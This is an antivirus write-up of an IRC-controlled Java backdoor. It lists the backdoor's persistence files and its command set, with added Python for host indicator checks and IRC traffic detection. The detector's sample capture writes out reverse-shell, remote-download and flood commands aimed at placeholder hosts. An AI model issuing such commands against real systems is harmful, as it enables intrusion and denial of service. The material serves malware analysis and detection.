Java.Backdoor.ReverseBackdoor.A

LOW
MEDIUM
~40KB
(Backdoor:Java/ReverseBackdoor)

Symptoms

Increased network activity.

It registers itself to be run automatically on system startup by copying itself into the user's Startup folder under the name jusched.jar (borrowed from jusched.exe, the legitimate Java Update Scheduler, so that the entry looks benign):
  • under Windows XP, it copies itself to %HOMEPATH%\Start Menu\Programs\Startup\jusched.jar;
  • under other versions of Windows, it copies itself to
    %HOMEPATH%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jusched.jar.
It also drops a protector component at %HOMEPATH%\syn.jar, which guards the main JAR against deletion.

The presence of C:\Program Files\win32.ini, which the bot uses to store its permanent IRC nickname (set with the .permnick command described below).
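The following is an added host-side check, not Bitdefender's tooling, that looks for the artifacts listed above: the Startup-folder JAR in both layouts, the syn.jar protector in the profile root, and the win32.ini nickname file under Program Files. The profile and Program Files roots are parameters (assumed, not from the write-up) so the check can be run against a copied profile or a test tree as well as a live machine.

```python
"""Host-side check for the persistence artifacts listed under Symptoms.

Added example, not Bitdefender's tooling. The profile root and Program
Files root are passed in so the same function works on a live machine,
a mounted image, or a test directory.
"""
import hashlib
import os
from pathlib import Path

# Locations from the write-up, relative to the user profile (%HOMEPATH%).
# "jusched" is the name of the legitimate Java Update Scheduler (jusched.exe);
# a jusched.jar in the Startup folder is not part of any Java install.
STARTUP_JAR_XP = Path("Start Menu") / "Programs" / "Startup" / "jusched.jar"
STARTUP_JAR_VISTA_PLUS = (Path("AppData") / "Roaming" / "Microsoft" / "Windows"
                          / "Start Menu" / "Programs" / "Startup" / "jusched.jar")
PROTECTOR_JAR = Path("syn.jar")
# Relative to the Program Files root (C:\Program Files on the analysed system).
NICK_FILE = Path("win32.ini")


def sha256_of(path):
    """Hash the file so a hit can be compared against other samples."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def looks_like_jar(path):
    """A JAR is a ZIP archive; the local-file-header magic is PK\\x03\\x04."""
    with open(path, "rb") as f:
        return f.read(4) == b"PK\x03\x04"


def find_indicators(profile_root, program_files_root):
    """Return a record for each of the write-up's artifacts present on disk."""
    profile = Path(profile_root)
    program_files = Path(program_files_root)
    candidates = [
        ("startup_jar_xp", profile / STARTUP_JAR_XP),
        ("startup_jar", profile / STARTUP_JAR_VISTA_PLUS),
        ("protector_jar", profile / PROTECTOR_JAR),
        ("irc_nick_file", program_files / NICK_FILE),
    ]
    hits = []
    for label, path in candidates:
        if not path.is_file():
            continue
        record = {
            "indicator": label,
            "path": str(path),
            "size": path.stat().st_size,
            "sha256": sha256_of(path),
        }
        if path.suffix.lower() == ".jar":
            # A ".jar" that is not a ZIP is still worth recording, not skipping.
            record["valid_jar"] = looks_like_jar(path)
        else:
            # win32.ini is a small text file holding the permanent nick.
            record["content"] = path.read_text(errors="replace").strip()
        hits.append(record)
    return hits


if __name__ == "__main__":
    # Live run for the current user. %HOMEPATH% lacks the drive letter, so the
    # full profile path comes from %USERPROFILE% on Windows.
    home = os.environ.get("USERPROFILE") or str(Path.home())
    pf = os.environ.get("ProgramFiles", r"C:\Program Files")
    for hit in find_indicators(home, pf):
        print(hit)
```

A hit on the Startup JAR alone is enough to pull the file for analysis; the hash lets you tie the sample to the syn.jar protector and to other machines showing the same win32.ini nickname.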

Removal instructions:

Please let BitDefender disinfect your files.

Analyzed By

JUHOS Csaba-Zsolt, virus researcher

Technical Description:

Java.Backdoor.ReverseBackdoor.A is an IRC-controlled backdoor written in Java. It can download and execute further malware components, update itself, and carry out a range of flooding and spamming commands on the botmaster's instruction.
 
In the wild it is found as a JAR file containing 40 obfuscated class files. The JAR is wrapped into an .exe using jshrink (http://www.e-t.com/jshrink.html) to obfuscate it further. The .exe is downloaded and executed by a malicious applet that asks the user to grant it permissions beyond the Java applet sandbox; the infection depends on the user accepting that prompt.
 
The bot starts by fetching its configuration from an online location. The configuration includes the IRC server's host and port, the names of the input and output channels, and the nicknames of the botmasters whose commands it will obey. It then forks a command-and-control thread, registers its Startup-folder autorun, and finishes by dropping and executing syn.jar to protect itself from deletion.
 
The command and control thread executes commands given on the IRC channels by the botmasters. Some of the supported commands:
 
  1. .commands: list all available commands, including command usage and description
  2. .exit: terminate the bot
  3. .quit <message>: quit IRC server
  4. .join <channel>: join an IRC channel
  5. .part <channel>: part an IRC channel
  6. .nickprefix <prefix>: change nick to a random number prefixed by <prefix>
  7. .permnick <nick>: change to a permanent nick
  8. .msg <channel> <message>: send a message to an IRC channel
  9. .raw <line>: send raw IRC command
  10. .download <url> [dir]: download file to the infected system
  11. .system <command>: execute system command
  12. .httpflood <url> <threads> <delay> <connections>
    .udpflood <host> <threads> <delay> <connections>
    .sflood <host> <port> <threads> <delay> <connections>
    .stopfloods
    HTTP, UDP and raw-socket flooding of a target (DDoS); .stopfloods ends all running floods
  13. .getip [url]: get the IP address of the infected system
  14. .mkdir <dir>: make directory
  15. .cd <dir>: change current directory
  16. .ls: list the contents of the current directory
  17. .corrupt <file> [message]: truncate file or replace it with a message
  18. .update <url>: update the bot with the JAR at <url>
  19. .send <send> <file> <port>: upload file from the infected system
  20. .spam <server> <port> <channel> [password] <nick> <message> <times> <delay>
    .stopspam
    flood a channel on another IRC server from the infected system; .stopspam ends it
  21. .backdoor <host> <port>: create a reverse shell on the infected system, connecting back to and controlled by <host>
  22. .ircscript <url>: run IRC script at <url>
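Because every command above is sent in the clear as an IRC PRIVMSG on the input channel, the command set doubles as a network signature. The following is an added detection example, not the bot's code and not a Bitdefender signature: it parses raw IRC lines as a proxy or IDS would log them, matches the first token of each message against the command list above, tags each hit with the capability it exposes, and ranks the senders of high-risk commands, which by the description should be the configured botmaster nicks. The sample capture, its nicks, channels and addresses are constructed.

```python
"""Detection over captured IRC traffic for this bot's command set.

Added example, not the bot's code or a Bitdefender signature. It works on
raw IRC lines (RFC 1459 framing) as a proxy or IDS would log them.
"""
import re
from collections import Counter, namedtuple

# Command list from the write-up, keyed to the capability it exposes.
BOT_COMMANDS = {
    ".httpflood": "ddos", ".udpflood": "ddos", ".sflood": "ddos", ".stopfloods": "ddos",
    ".spam": "irc-flood", ".stopspam": "irc-flood",
    ".download": "dropper", ".update": "dropper", ".ircscript": "dropper",
    ".system": "exec", ".backdoor": "reverse-shell",
    ".send": "exfil", ".corrupt": "destructive",
    ".commands": "recon", ".getip": "recon", ".ls": "recon", ".cd": "recon", ".mkdir": "recon",
    ".join": "irc", ".part": "irc", ".msg": "irc", ".raw": "irc",
    ".quit": "irc", ".exit": "irc", ".nickprefix": "irc", ".permnick": "irc",
}
HIGH_RISK = {"ddos", "dropper", "exec", "reverse-shell", "exfil", "destructive"}

# ":nick!user@host PRIVMSG #channel :message"; the prefix is optional.
PRIVMSG_RE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")

Hit = namedtuple("Hit", "sender target command category args")


def parse_privmsg(line):
    """Split one IRC line into (sender nick, target, text); None if not a PRIVMSG."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None
    sender = (m.group("prefix") or "").split("!", 1)[0]
    return sender, m.group("target"), m.group("text")


def classify(line):
    """Return a Hit if the message body starts with one of the bot's commands."""
    parsed = parse_privmsg(line)
    if parsed is None:
        return None
    sender, target, text = parsed
    tokens = text.split()
    if not tokens:
        return None
    command = tokens[0].lower()
    category = BOT_COMMANDS.get(command)
    if category is None:
        return None
    return Hit(sender, target, command, category, tokens[1:])


def scan(lines):
    """All bot-command hits in a capture, in capture order."""
    return [hit for hit in map(classify, lines) if hit is not None]


def suspected_botmasters(hits):
    """Nicks that issued high-risk commands, most active first.

    The write-up says the bot obeys a configured list of botmaster nicks, so
    the senders of dropper, exec, DDoS and reverse-shell commands are the
    identities to pivot on when reviewing the rest of the capture.
    """
    counts = Counter(h.sender for h in hits if h.category in HIGH_RISK)
    return counts.most_common()


# Constructed sample capture (not real traffic; addresses are documentation ranges).
SAMPLE_CAPTURE = [
    ":master!ops@203.0.113.5 PRIVMSG #cmd :.httpflood http://victim.example/ 10 0 50",
    ":alice!a@192.0.2.10 PRIVMSG #general :hello everyone",
    "PING :irc.example.net",
    ":master!ops@203.0.113.5 PRIVMSG #cmd :.backdoor 203.0.113.5 4444",
    ":x91234!j@198.51.100.7 PRIVMSG #out :joined #cmd",
    ":master!ops@203.0.113.5 PRIVMSG #cmd :.download http://203.0.113.5/x.exe",
    ":master!ops@203.0.113.5 PRIVMSG #cmd :.getip",
]

if __name__ == "__main__":
    found = scan(SAMPLE_CAPTURE)
    for hit in found:
        print(hit)
    print(suspected_botmasters(found))
```

Matching on the leading token keeps false positives low on ordinary chat, since few people open a message with ".system" or ".sflood"; the one remaining source of noise is other bots with the same command vocabulary, which is still a hit worth looking at. The .backdoor hit deserves priority: its arguments give you the host and port the reverse shell connects back to, which is a direct network indicator for egress filtering.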